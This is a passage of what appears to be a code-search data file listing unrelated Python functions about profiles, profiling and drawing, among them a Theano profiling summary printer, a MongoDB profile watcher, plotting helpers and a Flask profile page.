traits[2]\n\n\t## Calculation of constants over timescale of interest (here, the temperature is constant)\n\tDeltaG0catT = DeltaG0(T,deltaG0Cat,deltaH0Cat)\n\tDeltaG0anaT = DeltaG0(T,deltaG0Ana,deltaH0Ana)\n \n\t## Initialization\n\tHT = []\n\tCT = []\n\tNT = []\n\tGT = []\n\tXoT = []\n\tNCT = []\n\tXT = []\n\tD = []\n\ttime = []\n\tNPPT = []\n\tt=1\n\n\tHT.append(init[0])\n\tCT.append(init[1])\n\tNT.append(init[2])\n\tGT.append(init[3])\n\tXoT.append(init[4])\n\tNCT.append(init[5])\n\tXT.append(init[6])\n\tD.append(0)\n\ttime.append(0)\n\tt=1\n \n\twhile time[t-1] < tmax: \n\t\tH = HT[t-1]\n\t\tC = CT[t-1]\n\t\tN = NT[t-1]\n\t\tG = GT[t-1]\n\t\tXo = XoT[t-1]\n\t\tNC = NCT[t-1]\n\t\tX0 = XT[t-1]\n\n\t\tnNCT,nXT,qana,qcat,decay,mort,dt = Step_Profile(NC,X0,traits,[H,C,N,G],gamma,T,dt)\n\t\tNCT.append(nNCT)\n\t\tXT.append(nXT)\n\t\tD.append(decay+mort)\n\t\tnS = Step_Substrates([H,C,N,G],Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],qana,qcat,dt,Vc)\n\t\tHT.append(nS[0])\n\t\tCT.append(nS[1])\n\t\tNT.append(nS[2])\n\t\tGT.append(nS[3])\n\t\tNPPT.append(qana*NC)\n\n\t\tnXo = Step_DeadBiomass(Xo,Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],decay,mort,Qc,XT[t-1],dt,Vc)\n\t\tXoT.append(nXo)\n\t\ttime.append(time[t-1] + dt)\n\t\tt=t+1 \n#\t\tprint(time[t-1])\n\treturn(NCT,XT,HT,CT,NT,GT,XoT,D,time,NPPT)", "def plot_profiles(self, fig=0, title=''):\n plot_input.plot_profiles(self, fig, title)", "def setprofile(function): # real signature unknown; restored from __doc__\n pass", "def stamp(self):\n screen = self.screen\n shape = screen._shapes[self.Myturtle.shapeIndex]\n ttype = shape._type\n tshape = shape._data\n if ttype == \"polygon\":\n stitem = screen._createpoly()\n if self._resizemode == \"noresize\": w = 1\n elif self._resizemode == \"auto\": w = self._pensize\n else: w =self._outlinewidth\n shape = self._polytrafo(self._getshapepoly(tshape))\n fc, oc = self._fillcolor, self._pencolor\n screen._drawpoly(stitem, shape, fill=fc, outline=oc,\n width=w, top=True)\n elif ttype == \"image\":\n stitem = screen._createimage(\"\")\n screen._drawimage(stitem, self._position, tshape)\n elif ttype == \"compound\":\n stitem = []\n for element in tshape:\n item = screen._createpoly()\n stitem.append(item)\n stitem = tuple(stitem)\n for item, (poly, fc, oc) in zip(stitem, tshape):\n poly = self._polytrafo(self._getshapepoly(poly, True))\n screen._drawpoly(item, poly, fill=self._cc(fc),\n outline=self._cc(oc), width=self._outlinewidth, top=True)\n self.stampItems.append(stitem)\n self.undobuffer.push((\"stamp\", stitem))\n return stitem", "def draw_annotation(img, boxes, klass, polygons=None, is_crowd=None):\n labels = []\n assert len(boxes) == len(klass)\n if is_crowd is not None:\n assert len(boxes) == len(is_crowd)\n for cls, crd in zip(klass, is_crowd):\n clsname = cfg.DATA.CLASS_NAMES[cls]\n if crd == 1:\n clsname += ';Crowd'\n labels.append(clsname)\n else:\n for cls in klass:\n labels.append(cfg.DATA.CLASS_NAMES[cls])\n img = viz.draw_boxes(img, boxes, labels)\n\n if polygons is not None:\n for p in polygons:\n mask = polygons_to_mask(p, img.shape[0], img.shape[1])\n img = draw_mask(img, mask)\n return img", "def sweep(profile,n,capped=False):\n assert n > 2 and isinstance(n,int)\n profile = openPoly(profile)\n t = yRot(360/n)\n result = Mesh()\n\n if capped:\n first = profile[0]\n firstOnY = [0,first[1],0]\n if not near(first,firstOnY):\n print(\"adding bottom cap\")\n cap = []\n for i in range(n):\n cap.append(first)\n first = t(first)\n result.addPoly(cap)\n\n last = profile[-1]\n lastOnY = 
[0,last[1],0]\n if not near(last,lastOnY):\n print(\"adding top cap.\")\n cap = []\n for i in range(n):\n cap.append(last)\n last = t(last)\n result.addPoly(cap[::-1])\n\n for i in range(n):\n newProfile = t(profile)\n for ((p0,p1),(q0,q1)) in zip(edges(profile),edges(newProfile)):\n if near(p0,q0): # when p0 near y axis\n if not near(p1,q1):\n result.addTri([p0,p1,q1])\n elif near(p1,q1): # when p1 near y axis\n result.addTri([p0,p1,q0])\n else:\n result.addTri([p0,p1,q0])\n result.addTri([p1,q1,q0])\n profile = newProfile\n return result", "def draw_on_image(self, img):\n image = Image(img)\n\n # If the overlay has not expired, draw on the plate highlight and/or the status message\n if not self.has_expired():\n self._plate.draw_plate(image, Color.Blue())\n self._plate.draw_pins(image, self._options)", "def plot_ave_profile(f,y):\n favex = np.mean(f, axis=1) # Horizontal average\n\n # Plot\n fig, ax = plt.subplots(1,1, figsize=(15,9))\n ax.plot(favex, y)\n\n # Label\n ax.set_xlabel(r'$\\overline{T}$')\n ax.set_ylabel(r'$y$')\n fig.tight_layout()\n\n # Save\n fig.savefig('Tave.pdf')\n \n plt.show()", "def print_summary_(fct_name, compile_time, fct_call_time, fct_call,\r\n apply_time, apply_cimpl, message, variable_shape,\r\n local_time, other_time,\r\n n_apply_to_print=config.ProfileMode.n_apply_to_print,\r\n n_ops_to_print=config.ProfileMode.n_ops_to_print,\r\n print_apply=True,\r\n min_memory_size=config.ProfileMode.min_memory_size,\r\n ):\r\n\r\n print \"ProfileMode is deprecated! Use the new profiler.\"\r\n print \" The Theano flags to enable it ise: profile=True\"\r\n print \" The Theano flags for the memory profile to it is: profile_memory=True\"\r\n\r\n total_time = time.time() - import_time\r\n total_fct_time = sum(fct_call_time.values())\r\n total_fct_call = sum(fct_call.values())\r\n unknown_time = total_time - total_fct_time - compile_time\r\n overhead_time = total_fct_time - local_time\r\n if total_fct_time > 0:\r\n time_pr_in_fct = local_time / total_fct_time * 100\r\n overhead_time_pourcent_fct_time = (overhead_time / total_fct_time *\r\n 100)\r\n time_per_call = total_fct_time / total_fct_call\r\n else:\r\n time_pr_in_fct = 0\r\n overhead_time_pourcent_fct_time = 0\r\n time_per_call = 0\r\n\r\n print\r\n print 'ProfileMode.%s(%s)' % (fct_name,message)\r\n print '---------------------------'\r\n print\r\n print 'Time since import %.3fs'%(total_time)\r\n print 'Theano compile time: %.3fs (%.1f%% since import)'%(compile_time, compile_time/total_time*100)\r\n print ' Optimization time: %.3fs'%(other_time['optimizer_time'])\r\n print ' Linker time: %.3fs'%(other_time['linker_time'])\r\n print 'Theano fct call %.3fs (%.1f%% since import)'%(total_fct_time, total_fct_time/total_time*100)\r\n print ' Theano Op time %.3fs %.1f%%(since import) %.1f%%(of fct call)'% (\r\n local_time, local_time/total_time*100, time_pr_in_fct)\r\n print ' Theano function overhead in ProfileMode %.3fs %.1f%%(since import) %.1f%%(of fct call)'% (\r\n overhead_time, overhead_time/total_time*100, overhead_time_pourcent_fct_time)\r\n print '%i Theano fct call, %.3fs per call'%(total_fct_call, time_per_call)\r\n print 'Rest of the time since import %.3fs %.1f%%'%(unknown_time, unknown_time/total_time*100)\r\n\r\n print\r\n print 'Theano fct summary:'\r\n print '<% total fct time> <total time> <time per call> <nb call> <fct name>'\r\n for key in fct_call.keys():\r\n if fct_call[key]>0:\r\n print ' %4.1f%% %.3fs %.2es %d %s'%(fct_call_time[key]/total_fct_time*100 ,fct_call_time[key],\r\n 
fct_call_time[key]/fct_call[key], fct_call[key], key.name)\r\n else:\r\n print ' NOT CALLED',key.name\r\n\r\n\r\n # Compute stats per op.\r\n op_time = {}\r\n op_call = {}\r\n op_apply = {}\r\n op_cimpl = {}\r\n sop_apply = {}\r\n for (i,a),t in apply_time.items():\r\n op=a.op\r\n op_time.setdefault(op,0)\r\n op_call.setdefault(op,0)\r\n op_apply.setdefault(op,0)\r\n sop_apply.setdefault(type(a.op),0)\r\n op_time[op]+=t\r\n nb_call = [v for k,v in fct_call.items() if k.maker.fgraph is a.fgraph][0]\r\n op_cimpl.setdefault(a.op, True)\r\n op_cimpl[a.op] = op_cimpl[a.op] and apply_cimpl.get(a, False)\r\n if t==0:\r\n assert nb_call == 0, nb_call\r\n else:\r\n op_call[op] += nb_call\r\n op_apply[op] += 1\r\n sop_apply[type(a.op)] += 1\r\n\r\n # Compute stats per op class\r\n sop_time={}\r\n sop_call={}\r\n sop_op = {}\r\n sop_cimpl={} #map each op class to Bool. True iff all applies were done in c.\r\n for a,t in op_time.items():\r\n typ = type(a)\r\n sop_time.setdefault(typ,0)\r\n sop_time[typ]+=t\r\n sop_op.setdefault(typ,0)\r\n sop_op[typ]+=1\r\n sop_cimpl.setdefault(typ,True)\r\n sop_cimpl[typ]=sop_cimpl[typ] and op_cimpl.get(a, False)\r\n sop_call[typ]=sop_call.get(typ,0)+op_call[a]\r\n\r\n\r\n # Print the summary per op class.\r\n print\r\n print 'Single Op-wise summary:'\r\n print '<% of local_time spent on this kind of Op> <cumulative %> <self seconds> <cumulative seconds> <time per call> [*] <nb_call> <nb_op> <nb_apply> <Op name>'\r\n sotimes = [(t*100/local_time, t, a, sop_cimpl[a], sop_call[a], sop_op[a], sop_apply[a]) for a, t in sop_time.items()]\r\n sotimes.sort()\r\n sotimes.reverse()\r\n tot=0\r\n for f,t,a,ci, nb_call, nb_op, nb_apply in sotimes[:n_ops_to_print]:\r\n if nb_call == 0:\r\n assert t == 0\r\n continue\r\n tot+=t\r\n ftot=tot*100/local_time\r\n if ci:\r\n msg = '*'\r\n else:\r\n msg = ' '\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %5d %2d %2d %s' % (f, ftot, t, tot, t/nb_call, msg, nb_call, nb_op, nb_apply, a)\r\n print ' ... (remaining %i single Op account for %.2f%%(%.2fs) of the runtime)'\\\r\n %(max(0, len(sotimes)-n_ops_to_print),\r\n sum(soinfo[0] for soinfo in sotimes[n_ops_to_print:]),\r\n sum(soinfo[1] for soinfo in sotimes[n_ops_to_print:]))\r\n\r\n print '(*) Op is running a c implementation'\r\n\r\n\r\n # The summary per op\r\n op_flops = {}\r\n for a,t in op_time.items():\r\n if hasattr(a,'flops'):\r\n op_flops[a]=a.flops*op_call[a]/t/1e6\r\n flops_msg=''\r\n if op_flops:\r\n flops_msg=' <MFlops/s>'\r\n print '\\nHACK WARNING: we print the flops for some OP, but the logic don\\'t always work. You need to know the internal of Theano to make it work correctly. 
Otherwise don\\'t use!'\r\n print\r\n print 'Op-wise summary:'\r\n print '<%% of local_time spent on this kind of Op> <cumulative %%> <self seconds> <cumulative seconds> <time per call> [*] %s <nb_call> <nb apply> <Op name>'%(flops_msg)\r\n\r\n otimes = [(t*100/local_time, t, a, op_cimpl.get(a, 0), op_call.get(a, 0), op_apply.get(a,0))\r\n for a, t in op_time.items()]\r\n otimes.sort()\r\n otimes.reverse()\r\n tot=0\r\n for f,t,a,ci,nb_call,nb_apply in otimes[:n_ops_to_print]:\r\n if nb_call == 0:\r\n assert t == 0\r\n continue\r\n tot+=t\r\n ftot=tot*100/local_time\r\n if ci:\r\n msg = '*'\r\n else:\r\n msg = ' '\r\n if op_flops:\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %7.1f %5d %2d %s' % (f, ftot, t, tot, t/nb_call, msg, op_flops.get(a,-1), nb_call, nb_apply, a)\r\n else:\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %5d %2d %s' % (f, ftot, t, tot, t/nb_call, msg, nb_call, nb_apply, a)\r\n print ' ... (remaining %i Op account for %6.2f%%(%.2fs) of the runtime)'\\\r\n %(max(0, len(otimes)-n_ops_to_print),\r\n sum(f for f, t, a, ci, nb_call, nb_op in otimes[n_ops_to_print:]),\r\n sum(t for f, t, a, ci, nb_call, nb_op in otimes[n_ops_to_print:]))\r\n print '(*) Op is running a c implementation'\r\n\r\n\r\n if print_apply:\r\n print\r\n print 'Apply-wise summary:'\r\n print '<% of local_time spent at this position> <cumulative %%> <apply time> <cumulative seconds> <time per call> [*] <nb_call> <Apply position> <Apply Op name>'\r\n atimes = [(t*100/local_time, t, a, [v for k,v in fct_call.items() if k.maker.fgraph is a[1].fgraph][0]) for a, t in apply_time.items()]\r\n atimes.sort()\r\n atimes.reverse()\r\n tot=0\r\n for f,t,a,nb_call in atimes[:n_apply_to_print]:\r\n tot+=t\r\n ftot=tot*100/local_time\r\n if nb_call==0:\r\n continue\r\n if apply_cimpl.get(a[1], False):\r\n msg = '*'\r\n else:\r\n msg = ' '\r\n print ' %4.1f%% %5.1f%% %5.3fs %5.3fs %.2es %s %i %2i %s' % (\r\n f, ftot, t, tot, t/nb_call, msg, nb_call, a[0], str(a[1]))\r\n print ' ... (remaining %i Apply instances account for %.2f%%(%.2fs) of the runtime)'\\\r\n %(max(0, len(atimes)-n_apply_to_print),\r\n sum(f for f, t, a, nb_call in atimes[n_apply_to_print:]),\r\n sum(t for f, t, a, nb_call in atimes[n_apply_to_print:]))\r\n print '(*) Op is running a c implementation'\r\n for printer in profiler_printers:\r\n printer(fct_name, compile_time, fct_call_time, fct_call,\r\n apply_time, apply_cimpl, message, variable_shape,\r\n other_time)\r\n\r\n if not variable_shape:\r\n print \"\"\"\\nProfile of Theano intermediate memory disabled.\r\n To enabled, put the Theano flag ProfileMode.profile_memory to True.\"\"\"\r\n else:\r\n print \"\"\"\r\n The memory profile in ProfileMode is removed!\r\n Use the new profiler. 
Use the Theano flags\r\n profile=True,profile_memory=True to enable it.\"\"\"\r\n\r\n print\r\n print \"\"\"Here are tips to potentially make your code run faster\r\n(if you think of new ones, suggest them on the mailing list).\r\nTest them first, as they are not guaranteed to always provide a speedup.\"\"\"\r\n from theano import tensor as T\r\n from theano.tensor.raw_random import RandomFunction\r\n import theano\r\n import theano.scalar as scal\r\n scalar_op_amdlibm_no_speed_up = [scal.LT, scal.GT, scal.LE, scal.GE,\r\n scal.EQ, scal.NEQ, scal.InRange,\r\n scal.Switch, scal.OR, scal.XOR,\r\n scal.AND, scal.Invert, scal.Maximum,\r\n scal.Minimum, scal.Add, scal.Mul,\r\n scal.Sub, scal.TrueDiv, scal.IntDiv,\r\n scal.Clip, scal.Second, scal.Identity,\r\n scal.Cast, scal.Sgn, scal.Neg,\r\n scal.Inv, scal.Sqr]\r\n scalar_op_amdlibm_speed_up = [scal.Mod, scal.Pow, scal.Ceil,\r\n scal.Floor, scal.RoundHalfToEven,\r\n scal.RoundHalfAwayFromZero, scal.Log,\r\n scal.Log2, scal.Log10, scal.Log1p,\r\n scal.Exp, scal.Sqrt, scal.Abs, scal.Cos,\r\n scal.Sin, scal.Tan, scal.Tanh,\r\n scal.Cosh, scal.Sinh,\r\n T.nnet.sigm.ScalarSigmoid,\r\n T.nnet.sigm.ScalarSoftplus]\r\n # Abs, Mod in float{32,64} only\r\n\r\n def get_scalar_ops(s):\r\n if isinstance(s, theano.scalar.Composite):\r\n l = []\r\n for node in s.fgraph.toposort():\r\n l += get_scalar_ops(node.op)\r\n return l\r\n else:\r\n return [s]\r\n\r\n def list_scalar_op(op):\r\n if isinstance(op.scalar_op, theano.scalar.Composite):\r\n return get_scalar_ops(op.scalar_op)\r\n else:\r\n return [op.scalar_op]\r\n\r\n def amdlibm_speed_up(op):\r\n if not isinstance(op, T.Elemwise):\r\n return False\r\n else:\r\n l = list_scalar_op(op)\r\n for s_op in l:\r\n if s_op.__class__ in scalar_op_amdlibm_speed_up:\r\n return True\r\n elif s_op.__class__ not in scalar_op_amdlibm_no_speed_up:\r\n print \"We don't know if amdlibm will accelerate this scalar op.\", s_op\r\n return False\r\n\r\n def exp_float32_op(op):\r\n if not isinstance(op, T.Elemwise):\r\n return False\r\n else:\r\n l = list_scalar_op(op)\r\n return any([s_op.__class__ in [scal.Exp] for s_op in l])\r\n\r\n printed_tip = False\r\n #tip 1\r\n if config.floatX == 'float64':\r\n print \" - Try the Theano flag floatX=float32\"\r\n printed_tip = True\r\n\r\n #tip 2\r\n if not config.lib.amdlibm and any([amdlibm_speed_up(a.op) for i, a\r\n in apply_time]):\r\n print \" - Try installing amdlibm and set the Theano flag lib.amdlibm=True. This speeds up only some Elemwise operation.\"\r\n printed_tip = True\r\n\r\n #tip 3\r\n if not config.lib.amdlibm and any([exp_float32_op(a.op) and\r\n a.inputs[0].dtype == 'float32'\r\n for i, a in apply_time]):\r\n print (\" - With the default gcc libm, exp in float32 is slower \"\r\n \"than in float64! Try Theano flag floatX=float64, or \"\r\n \"install amdlibm and set the theano flags lib.amdlibm=True\")\r\n printed_tip = True\r\n\r\n #tip 4\r\n for a, t in apply_time.iteritems():\r\n node = a[1]\r\n if (isinstance(node.op, T.Dot) and\r\n all([len(i.type.broadcastable) == 2 for i in node.inputs])):\r\n print (\" - You have a dot operation that was not optimized to\"\r\n \" dot22 (which is faster). Make sure the inputs are \"\r\n \"float32 or float64, and are the same for both inputs. 
\"\r\n \"Currently they are: %s\" %\r\n [i.type for i in node.inputs])\r\n printed_tip = True\r\n\r\n #tip 5\r\n for a, t in apply_time.iteritems():\r\n node = a[1]\r\n if isinstance(node.op, RandomFunction):\r\n printed_tip = True\r\n print (\" - Replace the default random number generator by \"\r\n \"'from theano.sandbox.rng_mrg import MRG_RandomStreams \"\r\n \"as RandomStreams', as this is is faster. It is still \"\r\n \"experimental, but seems to work correctly.\")\r\n if config.device.startswith(\"gpu\"):\r\n print (\" - MRG_RandomStreams is the only random number\"\r\n \" generator supported on the GPU.\")\r\n break\r\n\r\n if not printed_tip:\r\n print \" Sorry, no tip for today.\"", "def info(ctx, input, aspect, indent, namespace, meta_member, verbose, bidx,\n masked):\n verbosity = (ctx.obj and ctx.obj.get('verbosity')) or 1\n logger = logging.getLogger('rio')\n mode = 'r' if (verbose or meta_member == 'stats') else 'r-'\n\n try:\n with rasterio.drivers(CPL_DEBUG=(verbosity > 2)):\n with rasterio.open(input, mode) as src:\n info = src.profile\n info['transform'] = info['affine'][:6]\n del info['affine']\n info['shape'] = info['height'], info['width']\n info['bounds'] = src.bounds\n proj4 = rasterio.crs.to_string(src.crs)\n if proj4.startswith('+init=epsg'):\n proj4 = proj4.split('=')[1].upper()\n info['crs'] = proj4\n info['res'] = src.res\n info['lnglat'] = src.lnglat()\n if verbose:\n stats = [{'min': float(b.min()),\n 'max': float(b.max()),\n 'mean': float(b.mean())\n } for b in src.read(masked=masked)]\n info['stats'] = stats\n info['checksum'] = [src.checksum(i) for i in src.indexes]\n if aspect == 'meta':\n if meta_member == 'stats':\n band = src.read(bidx, masked=masked)\n click.echo('%f %f %f' % (\n float(band.min()),\n float(band.max()),\n float(band.mean())))\n elif meta_member == 'checksum':\n click.echo(str(src.checksum(bidx)))\n elif meta_member:\n if isinstance(info[meta_member], (list, tuple)):\n click.echo(\" \".join(map(str, info[meta_member])))\n else:\n click.echo(info[meta_member])\n else:\n click.echo(json.dumps(info, indent=indent))\n elif aspect == 'tags':\n click.echo(\n json.dumps(src.tags(ns=namespace), indent=indent))\n except Exception:\n logger.exception(\"Exception caught during processing\")\n raise click.Abort()", "def format(self, record):\n stack = inspect.stack(context=0)\n depth = len(stack)\n if self.baseline is None:\n self.baseline = depth\n if self.cut is None:\n filenames = map(lambda x: x.filename, stack)\n self.cut = self.identify_cut(filenames)\n\n # Inject custom information into the record\n record.indent = \".\" * (depth - self.baseline + self.manual_push)\n if depth > self.cut:\n record.function = stack[self.cut].function\n\n # Format the record using custom information\n self.update_format(record)\n out = super().format(record)\n\n # Remove custom information from the record\n del record.indent\n if hasattr(record, \"function\"):\n del record.function\n\n return out", "def ProfilePlot(t,y,z,scale=86400, axis=0,color=[0.5,0.5,0.5]):\r\n from matplotlib import collections\r\n from matplotlib.ticker import Formatter\r\n\r\n class MyFormatter(Formatter):\r\n def __init__(self, dates, fmt='%b %d %Y'):\r\n self.fmt = fmt\r\n self.dates = dates\r\n\r\n def __call__(self, x, pos=0):\r\n 'Return the label for time x s'\r\n return datetime.strftime(datetime(1990,1,1)+timedelta(seconds=x),self.fmt)\r\n\r\n tsec = othertime.SecondsSince(t)\r\n formatter = MyFormatter(tsec)\r\n \r\n y = np.swapaxes(y,0,axis)\r\n \r\n lines=[]\r\n line2 =[]\r\n 
for ii, tt in enumerate(tsec):\r\n #xplot = set_scale(y[:,ii],tt)\r\n xplot = tt + y[:,ii]*scale\r\n lines.append(np.array((xplot,z)).T)\r\n line2.append(np.array([[tt,tt],[z[0],z[-1]]]).T)\r\n \r\n \r\n LC1 = collections.LineCollection(lines,colors=color,linewidths=1.5)\r\n LC2 = collections.LineCollection(line2,colors='k',linestyles='dashed') # Zero axis\r\n \r\n ax=plt.gca()\r\n ax.add_collection(LC1)\r\n ax.add_collection(LC2)\r\n ax.set_ylim((z.min(),z.max()))\r\n ax.xaxis.set_major_formatter(formatter)\r\n ax.set_xlim((tsec[0],tsec[-1]))\r\n plt.xticks(rotation=17) \r\n \r\n return ax", "def combine_profiles(profiles):\n rd_abs = dict() # dict of absolute time refs\n rd_rel = dict() # dict of relative time refs\n pd_abs = dict() # profiles which have absolute time refs\n pd_rel = dict() # profiles which have relative time refs\n\n for prof in profiles:\n p = list()\n tref = None\n qed = 0\n with open(prof, 'r') as csvfile:\n reader = csv.DictReader(csvfile, fieldnames=_prof_fields)\n empty = True\n for row in reader:\n\n # skip header\n if row['time'].startswith('#'):\n continue\n\n empty = False\n row['time'] = float(row['time'])\n \n # find first tref\n if not tref:\n if row['event'] == 'sync rel' : \n tref = 'rel'\n rd_rel[prof] = [row['time'], row['msg']]\n if row['event'] == 'sync abs' : \n tref = 'abs'\n rd_abs[prof] = [row['time']] + row['msg'].split(':')\n\n # Record closing entries\n if row['event'] == 'QED':\n qed += 1\n\n # store row in profile\n p.append(row)\n \n if tref == 'abs': pd_abs[prof] = p\n elif tref == 'rel': pd_rel[prof] = p\n elif not empty : print 'WARNING: skipping profile %s (no sync)' % prof\n\n # Check for proper closure of profiling files\n if qed == 0:\n print 'WARNING: profile \"%s\" not correctly closed.' % prof\n if qed > 1:\n print 'WARNING: profile \"%s\" closed %d times.' % (prof, qed)\n\n # make all timestamps absolute for pd_abs profiles\n for prof, p in pd_abs.iteritems():\n \n # the profile created an entry t_rel at t_abs.\n # The offset is thus t_abs - t_rel, and all timestamps\n # in the profile need to be corrected by that to get absolute time\n t_rel = float(rd_abs[prof][0])\n t_stamp = float(rd_abs[prof][1])\n t_zero = float(rd_abs[prof][2])\n t_abs = float(rd_abs[prof][3])\n t_off = t_abs - t_rel\n \n for row in p:\n row['time'] = row['time'] + t_off\n \n # combine the abs profiles into a global one. 
We will add rel rpfiles as\n # they are corrected.\n p_glob = list()\n for prof, p in pd_abs.iteritems():\n p_glob += p\n\n \n # reference relative profiles\n for prof, p in pd_rel.iteritems():\n \n # a sync message was created at time t_rel\n t_rel = rd_rel[prof][0]\n t_msg = rd_rel[prof][1]\n \n # now find the referenced sync point in other, absolute profiles\n t_ref = None\n for _prof, _p in pd_abs.iteritems():\n if not t_ref:\n for _row in _p:\n if _row['event'] == 'sync ref' and \\\n _row['msg'] == t_msg:\n t_ref = _row['time'] # referenced timestamp\n break\n \n if t_ref == None:\n print \"WARNING: 'sync rel' reference not found %s\" % prof\n continue\n \n # the profile's sync reference t_rel was created at the t_abs of the\n # referenced point (t_ref), so all timestamps in the profile need to be\n # corrected by (t_ref - t_rel)\n t_off = t_ref - t_rel\n \n for row in p:\n row['time'] = row['time'] + t_off\n p_glob.append(row)\n\n # we now have all profiles combined into one large profile, and can make\n # timestamps relative to its smallest timestamp again\n \n # find the smallest time over all profiles\n t_min = 9999999999.9 # future...\n for row in p_glob:\n t_min = min(t_min, row['time'])\n \n # make times relative to t_min again\n for row in p_glob:\n row['time'] -= t_min\n \n # sort by time and return\n p_glob = sorted(p_glob[:], key=lambda k: k['time']) \n\n return p_glob", "def watch_profile(self):\r\n profile_parser = ProfileParser()\r\n databases = self._get_requested_databases()\r\n connection = pymongo.MongoClient(self._db_uri,\r\n document_class=OrderedDict,\r\n read_preference=pymongo.ReadPreference.PRIMARY_PREFERRED)\r\n enabled_profile = False\r\n\r\n if databases == []:\r\n try:\r\n databases = connection.database_names()\r\n except:\r\n message = \"Error: Could not list databases on server. Please \" \\\r\n + \"check the auth components of your URI.\\n\"\r\n sys.stderr.write(message)\r\n databases = []\r\n\r\n for ignore_db in IGNORE_DBS:\r\n if ignore_db in databases:\r\n databases.remove(ignore_db)\r\n\r\n if len(databases) != 1:\r\n message = \"Error: Please use namespaces (-n) to specify a single \" \\\r\n + \"database for profile watching.\\n\"\r\n sys.stderr.write(message)\r\n return 1\r\n\r\n database = databases[0]\r\n db = connection[database]\r\n\r\n initial_profile_level = db.profiling_level()\r\n\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Profile level currently 0. Dex is setting profile \" \\\r\n + \"level 1. To run --watch at profile level 2, \" \\\r\n + \"enable profile level 2 before running Dex.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(DEFAULT_PROFILE_LEVEL)\r\n\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n try:\r\n for profile_entry in self._tail_profile(db, WATCH_INTERVAL_SECONDS):\r\n self._process_query(profile_entry,\r\n profile_parser)\r\n if time.time() >= output_time:\r\n self._output_aggregated_report(sys.stderr)\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n except KeyboardInterrupt:\r\n sys.stderr.write(\"Interrupt received\\n\")\r\n finally:\r\n self._output_aggregated_report(sys.stdout)\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Dex is resetting profile level to initial value \" \\\r\n + \"of 0. 
You may wish to drop the system.profile \" \\\r\n + \"collection.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(initial_profile_level)\r\n\r\n return 0", "def inspect(\n name: Optional[str] = typer.Argument(\n None, help=\"Name of profile to inspect; defaults to active profile.\"\n )\n):\n profiles = prefect.settings.load_profiles()\n if name is None:\n current_profile = prefect.context.get_settings_context().profile\n if not current_profile:\n exit_with_error(\"No active profile set - please provide a name to inspect.\")\n name = current_profile.name\n print(f\"No name provided, defaulting to {name!r}\")\n if name not in profiles:\n exit_with_error(f\"Profile {name!r} not found.\")\n\n if not profiles[name].settings:\n # TODO: Consider instructing on how to add settings.\n print(f\"Profile {name!r} is empty.\")\n\n for setting, value in profiles[name].settings.items():\n app.console.print(f\"{setting.name}='{value}'\")", "def _createTextProfile(self, indict):\r\n\r\n keys = map(lambda x: x[0], indict)\r\n vals = map(lambda x: x[1], indict)\r\n\r\n outstrs = [\"\\n\"]\r\n propDict = {}\r\n total = sum(vals)\r\n maxLenKey = max([len(a) for a in keys])\r\n maxLenVal = max([len(repr(a)) for a in vals]) \r\n\r\n for k, v in indict:\r\n outstr = \" \"\r\n outstr += k.ljust(maxLenKey + 1)\r\n outstr += (\"%.2f\" % v).ljust(maxLenVal + 1)\r\n outstr += \"-\" * int(self.numBars * (v / total))\r\n outstrs.append(outstr)\r\n\r\n return \"\\n\".join(outstrs)", "def test_execution_profiling(self):\n self._test_reports_helper({\"--profile-execution\": \"\"}, [\"report.txt\"])", "def draw(self, image, color=(0,255,0), thickness=2, drawText=False):\n\t\tif drawText:\n\t\t\timage = self.drawText(image=image, color=color)\n\t\tcv2.rectangle(image, (self.xmin,self.ymin), (self.xmax,self.ymax), color, thickness)\n\n\t\treturn image", "def set_drawing_offset(self, offset: Vector2NumberType) -> 'BaseImage':\n assert_vector(offset, 2)\n self._drawing_offset = (int(offset[0]), int(offset[1]))\n return self", "def set_profile(self, profile: str):\n self._profile = profile", "def render_applicant_profile(mysql: MySQL, jap_id: int):\n message = \"\"\n try:\n tid = -1\n applicant = get_applicant_profile(mysql, jap_id)\n if current_user.is_authenticated:\n user_teams = get_user_teams(mysql, current_user.uid)\n tid = user_teams[0].tid\n pfp = get_pic(mysql, applicant.uid)\n if pfp:\n if os.path.exists(\"./static/pfp.png\"):\n os.remove(\"./static/pfp.png\")\n with open('./static/pfp.png', 'wb') as wf:\n wf.write(pfp)\n return render_template('applicant_profile.html', applicant=applicant,\n message=message, tid=tid, pic=pfp)\n except Exception as e:\n return render_template('applicant_profile.html', message=e, tid=tid)", "def add_data(self, skins, method='common', colours=8):\n if not isinstance(skins, list):\n skins = [skins]\n for skin in skins:\n if method == 'common':\n rgb = ImageColour.get_most_common(skin.get_file_path(self.skin_directory, 'loading'), colours)\n else:\n rgb = ImageColour.get_average(skin.get_file_path(self.skin_directory, 'loading'))\n h, radius, _ = rgb_to_hsv(rgb.r, rgb.g, rgb.b)\n angle = h * 2 * np.pi\n img = Image.open(skin.get_file_path(self.skin_directory, 'tiles'))\n ab = AnnotationBbox(OffsetImage(img, zoom=0.13), (angle, radius), frameon=False)\n self.ax.add_artist(ab)\n self.figure = plt.gcf()", "def testProfile2D(self):\n self.plot = StackView()\n self.plot.show()\n self.qWaitForWindowExposed(self.plot)\n\n self.plot.setStack(numpy.array([[[0, 1], [2, 3]],\n [[4, 5], 
